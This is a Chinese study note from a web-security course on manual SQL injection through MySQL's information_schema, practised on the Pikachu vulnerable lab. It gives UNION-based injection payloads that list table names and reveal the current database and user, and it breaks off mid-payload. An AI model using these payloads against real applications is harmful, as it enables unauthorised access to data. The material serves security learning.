《WEB安全从入门到放弃》学习笔记2
(11.通过Information_schema拿下数据库–手工测试完整案例演示)
一 Information_schema数据库:中含有多个表,重点以下两个
1.tables表:用于存储table_schema,将整个数据库的所有实例的表的相关信息都放在这里;把表对应的相应数据库的名称,表的类型,默认额引擎,版本等信息存储在tables表里;
2.columns表:用于存储相关的列,数据库的表的实例的名称,对应的表名,列名。
二 获取表名:(首先用use pikachu命令切换至皮卡丘数据库中执行获取操作)
select id,email from member where username=‘kobe’ union select
table_schema,table_name from information_schema,tables where
table_schema=’pikachu’;
进一步获取information_schema中的信息需要:
获取当前数据库的名称
(kobe’union seclect database(),user()#)
->通过information_schema获取数据
(Test payload:kobe’union sec